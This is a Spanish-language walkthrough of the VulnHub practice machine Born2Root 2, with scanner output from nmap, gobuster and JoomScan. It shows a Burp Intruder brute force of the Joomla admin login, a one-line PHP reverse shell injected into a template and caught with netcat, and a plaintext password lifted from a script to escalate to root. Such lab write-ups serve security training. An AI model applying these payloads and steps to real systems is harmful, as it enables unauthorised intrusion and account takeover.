Write Up BORN2ROOT_2 VulnHub
Escaneo de puertos
nmap -p- --min-rate 5000 -sV <IP>
Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 15:50 EDT
Nmap scan report for 192.168.5.167
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Welcome to my website
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33682/udp status
| 100024 1 36574/udp6 status
| 100024 1 50581/tcp6 status
|_ 100024 1 58706/tcp status
58706/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:CC:3D:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.30 ms 192.168.5.167
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.15 seconds
Gobuster
gobuster dir -u http://<IP>/ -w <WORDLIST> -x html,php,txt -t 50 -k -r
Info:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.167/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 297]
/.htpasswd (Status: 403) [Size: 297]
/.htpasswd.txt (Status: 403) [Size: 301]
/.htaccess.html (Status: 403) [Size: 302]
/.htpasswd.php (Status: 403) [Size: 301]
/.htpasswd.html (Status: 403) [Size: 302]
/LICENSE (Status: 200) [Size: 1093]
/.htaccess.php (Status: 403) [Size: 301]
/.htaccess.txt (Status: 403) [Size: 301]
/css (Status: 200) [Size: 1144]
/img (Status: 200) [Size: 1798]
/index.html (Status: 200) [Size: 8454]
/javascript (Status: 403) [Size: 299]
/js (Status: 200) [Size: 1144]
/manual (Status: 200) [Size: 626]
/joomla (Status: 200) [Size: 8471]
/server-status (Status: 403) [Size: 301]
/vendor (Status: 200) [Size: 1766]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================
Vemos varias cosas interesantes, como por ejemplo un joomla
...
gobuster dir -u http://<IP>/joomla/ -w <WORDLIST> -x html,php,txt -t 50 -k -r
Info:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.167/joomla/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.txt (Status: 403) [Size: 308]
/.htpasswd.txt (Status: 403) [Size: 308]
/.htpasswd.html (Status: 403) [Size: 309]
/.htpasswd (Status: 403) [Size: 304]
/.htaccess.html (Status: 403) [Size: 309]
/.htpasswd.php (Status: 403) [Size: 308]
/.htaccess.php (Status: 403) [Size: 308]
/LICENSE.txt (Status: 200) [Size: 18092]
/README.txt (Status: 200) [Size: 4239]
/.htaccess (Status: 403) [Size: 304]
/administrator (Status: 200) [Size: 5326]
/bin (Status: 200) [Size: 31]
/cache (Status: 200) [Size: 31]
/cli (Status: 200) [Size: 31]
/components (Status: 200) [Size: 31]
/configuration.php (Status: 200) [Size: 0]
/htaccess.txt (Status: 200) [Size: 2915]
/images (Status: 200) [Size: 31]
/includes (Status: 200) [Size: 31]
/index.php (Status: 200) [Size: 8501]
/layouts (Status: 200) [Size: 31]
/language (Status: 200) [Size: 31]
/libraries (Status: 200) [Size: 31]
/media (Status: 200) [Size: 31]
/modules (Status: 200) [Size: 31]
/plugins (Status: 200) [Size: 31]
/templates (Status: 200) [Size: 31]
/tmp (Status: 200) [Size: 31]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================
Si utilizamos un repositorio de GitHub
para descargarnos el joomscan
, haremos lo siguiente...
perl joomscan.pl --url http://<IP>/joomla/
Info:
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.5.167/joomla/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.6.0
[+] Core Joomla Vulnerability
[++] Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation
CVE : CVE-2016-8870 , CVE-2016-8869
EDB : https://www.exploit-db.com/exploits/40637/
Joomla! Core Remote Privilege Escalation Vulnerability
CVE : CVE-2016-9838
EDB : https://www.exploit-db.com/exploits/41157/
Joomla! Core Security Bypass Vulnerability
CVE : CVE-2016-9081
https://developer.joomla.org/security-centre/661-20161003-core-account-modifications.html
Joomla! Core Arbitrary File Upload Vulnerability
CVE : CVE-2016-9836
https://developer.joomla.org/security-centre/665-20161202-core-shell-upload.html
Joomla! Information Disclosure Vulnerability
CVE : CVE-2016-9837
https://developer.joomla.org/security-centre/666-20161203-core-information-disclosure.html
PHPMailer Remote Code Execution Vulnerability
CVE : CVE-2016-10033
https://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
https://github.com/opsxcq/exploit-CVE-2016-10033
EDB : https://www.exploit-db.com/exploits/40969/
PPHPMailer Incomplete Fix Remote Code Execution Vulnerability
CVE : CVE-2016-10045
https://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
EDB : https://www.exploit-db.com/exploits/40969/
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.5.167/joomla/administrator/components
http://192.168.5.167/joomla/administrator/modules
http://192.168.5.167/joomla/administrator/templates
http://192.168.5.167/joomla/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.5.167/joomla/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.5.167/
Si hacemos lo siguiente...
perl joomscan.pl --url http://<IP>/joomla/administrator/ -ec
Info:
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.5.167/joomla/administrator/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.6.0
[+] Core Joomla Vulnerability
[++] Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation
CVE : CVE-2016-8870 , CVE-2016-8869
EDB : https://www.exploit-db.com/exploits/40637/
Joomla! Core Remote Privilege Escalation Vulnerability
CVE : CVE-2016-9838
EDB : https://www.exploit-db.com/exploits/41157/
Joomla! Core Security Bypass Vulnerability
CVE : CVE-2016-9081
https://developer.joomla.org/security-centre/661-20161003-core-account-modifications.html
Joomla! Core Arbitrary File Upload Vulnerability
CVE : CVE-2016-9836
https://developer.joomla.org/security-centre/665-20161202-core-shell-upload.html
Joomla! Information Disclosure Vulnerability
CVE : CVE-2016-9837
https://developer.joomla.org/security-centre/666-20161203-core-information-disclosure.html
PHPMailer Remote Code Execution Vulnerability
CVE : CVE-2016-10033
https://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
https://github.com/opsxcq/exploit-CVE-2016-10033
EDB : https://www.exploit-db.com/exploits/40969/
PPHPMailer Incomplete Fix Remote Code Execution Vulnerability
CVE : CVE-2016-10045
https://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
EDB : https://www.exploit-db.com/exploits/40969/
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.5.167/joomla/administrator/components
http://192.168.5.167/joomla/administrator/modules
http://192.168.5.167/joomla/administrator/templates
http://192.168.5.167/joomla/administrator/includes
http://192.168.5.167/joomla/administrator/language
http://192.168.5.167/joomla/administrator/templates
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page not found
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
[+] Enumeration component (com_admin)
[++] Name: com_admin
Location : http://192.168.5.167/joomla/administrator/components/com_admin/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_admin/
Installed version : 3.1
[+] Enumeration component (com_ajax)
[++] Name: com_ajax
Location : http://192.168.5.167/joomla/administrator/components/com_ajax/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_ajax/
Installed version : 3.2
[+] Enumeration component (com_banners)
[++] Name: com_banners
Location : http://192.168.5.167/joomla/administrator/components/com_banners/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_banners/
Installed version : 3.1
[+] Enumeration component (com_contact)
[++] Name: com_contact
Location : http://192.168.5.167/joomla/administrator/components/com_contact/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_contact/
Installed version : 3.1
[+] Enumeration component (com_content)
[++] Name: com_content
Location : http://192.168.5.167/joomla/administrator/components/com_content/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_content/
Installed version : 3.1
[+] Enumeration component (com_contenthistory)
[++] Name: com_contenthistory
Location : http://192.168.5.167/joomla/administrator/components/com_contenthistory/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_contenthistory/
Installed version : 3.2
[+] Enumeration component (com_finder)
[++] Name: com_finder
Location : http://192.168.5.167/joomla/administrator/components/com_finder/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_finder/
Installed version : 3.1
[+] Enumeration component (com_installer)
[++] Name: com_installer
Location : http://192.168.5.167/joomla/administrator/components/com_installer/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_installer/
Installed version : 3.1
[+] Enumeration component (com_joomlaupdate)
[++] Name: com_joomlaupdate
Location : http://192.168.5.167/joomla/administrator/components/com_joomlaupdate/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_joomlaupdate/
Installed version : 3.1
[+] Enumeration component (com_media)
[++] Name: com_media
Location : http://192.168.5.167/joomla/administrator/components/com_media/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_media/
Installed version : 3.1
[+] Enumeration component (com_newsfeeds)
[++] Name: com_newsfeeds
Location : http://192.168.5.167/joomla/administrator/components/com_newsfeeds/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_newsfeeds/
Installed version : 3.1
[+] Enumeration component (com_search)
[++] Name: com_search
Location : http://192.168.5.167/joomla/administrator/components/com_search/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_search/
Installed version : 3.1
[+] Enumeration component (com_users)
[++] Name: com_users
Location : http://192.168.5.167/joomla/administrator/components/com_users/
Directory listing is enabled : http://192.168.5.167/joomla/administrator/components/com_users/
Installed version : 3.1
Your Report : reports/192.168.5.167/
Vemos que hay varias vulnerabilidades tanto de Exploit-DB
como de los posibles componentes que nos descubrio...
Pero lo que haremos sera un diccionario personalizado cogiendo palabras de la propia pagina de joomla
haciendo lo siguiente...
cewl http://<IP>/joomla > dic.txt
Lo que haremos sera abrir BurpSuit
para tirarle un ataque de fuerza bruta con ese diccionario y con el usuario admin
...
Lo que haremos sera capturar la peticion del login pasarselo al Intruder
con ^I
y de ahi cargamos el diccionario en el payload
, despues seleccionamos la casilla del contenido de password
y le damos al boton Add§
y despues le damos a Atacar
en la seccion de payload
...
![[Pasted image 20240604101628.png]]
Cuando haya acabado el ataque tendremos que ver el ultimo codigo 200
pues el anterior que sea codigo 303
sera la contraseña, se vera de la siguiente manera...
![[Pasted image 20240604101429.png]]
Por lo que ya descubrimos la contraseña travel
, ahora nos iremos a logear...
Una vez dentro, nos iremos a Themes
y de ahi a la opcion de Templates
, dentro del mismo nos vamos a cualquier .php
por ejemplo elegi index.php
y estaremos en el editor para inyectar codigo y asi poder hacer una Reverse Shell
...
$sock=fsockopen("<IP>",<PORT>);shell_exec("sh <&3 >&3 2>&3");
Eso lo tendremos que poner en el codigo y guardarlo, le damos a Template Preview
para que se active la shell por asi decirlo y estando a la escucha...
nc -lvnp <PORT>
Una vez hecho eso tendremos una shell con www-data
...
La sanitizaremos...
script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
Si hacemos lo siguiente...
www-data@born2root:/home/tim$ find / -type f -perm -4000 -ls 2>/dev/null
138907 12 -rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
144166 356 -rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
144700 552 -rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
155634 176 -rwsrwxrwx 1 root root 176400 Sep 8 2017 /usr/bin/sudo
696 40 -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
1698 28 -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
1697 36 -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
Veremos esta linea...
155634 176 -rwsrwxrwx 1 root root 176400 Sep 8 2017 /usr/bin/sudo
Por lo que podemos escribirlo, editarlo y ejecutarlo como si fuera root
, pero no se puede hacer mucho...
Si nos vamos a /opt/scripts/
veremos un archivo llamado fileshare.py
con los siguientes permisos...
-rwxr-xr-x 1 tim tim 445 Feb 28 2019 fileshare.py
Pertenece a tim
por lo que tendremos que explotarlo para ser tim
...
Si leemos el script de python
veremos lo siguiente...
#!/usr/bin/env python
import sys, paramiko
if len(sys.argv) < 5:
print "args missing"
sys.exit(1)
hostname = "localhost"
password = "lulzlol"
source = "/var/www/html/joomla"
dest = "/tmp/backup/joomla"
username = "tim"
port = 22
try:
t = paramiko.Transport((hostname, port))
t.connect(username=username, password=password)
sftp = paramiko.SFTPClient.from_transport(t)
sftp.get(source, dest)
finally:
t.close()
Vemos que muestra una password
por lo que probaremos a insertarla en el usuario tim
...
Credentials
User = tim
Password = lulzlol
Con esto ya seriamos tim
...
Si hacemos sudo -l
veremos lo siguiente...
Matching Defaults entries for tim on born2root:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tim may run the following commands on born2root:
(ALL : ALL) ALL
Con esto podremos ser root
, haciendo lo siguiente...
sudo su
Una vez siendo root
leeremos la flag...
flag.txt (flagfinal)
.andAHHAbnn.
.aAHHHAAUUAAHHHAn.
dHP^~" "~^THb.
. .AHF YHA. .
| .AHHb. .dHHA. |
| HHAUAAHAbn adAHAAUAHA |
I HF~"_____ ____ ]HHH I
HHI HAPK""~^YUHb dAHHHHHHHHHH IHH
HHI HHHD> .andHH HHUUP^~YHHHH IHH
YUI ]HHP "~Y P~" THH[ IUP
" `HK ]HH' "
THAn. .d.aAAn.b. .dHHP
]HHHHAAUP" ~~ "YUAAHHHH[
`HHP^~" .annn. "~^YHH'
YHb ~" "" "~ dHF
"YAb..abdHHbndbndAP"
THHAAb. .adAHHF
"UHHHHHHHHHHU"
]HHUUHHHHHH[
.adHHb "HHHHHbn.
..andAAHHHHHHb.AHHHHHHHAAbnn..
.ndAAHHHHHHUUHHHHHHHHHHUP^~"~^YUHHHAAbn.
"~^YUHHP" "~^YUHHUP" "^YUP^"
"" "~~"
W00t w00t ! If you are reading this text then Congratulations !!
I hope you liked the second episode of 'Born2root' if you liked it please ping me in Twitter @h4d3sw0rm .
If you want to try more boxes like this created by me , try this new sweet lab called 'Wizard-Labs' which is a platform which hosts many boot2root machines to improve your pentesting skillset https://labs.wizard-security.net !
Until we meet again :-)
Last updated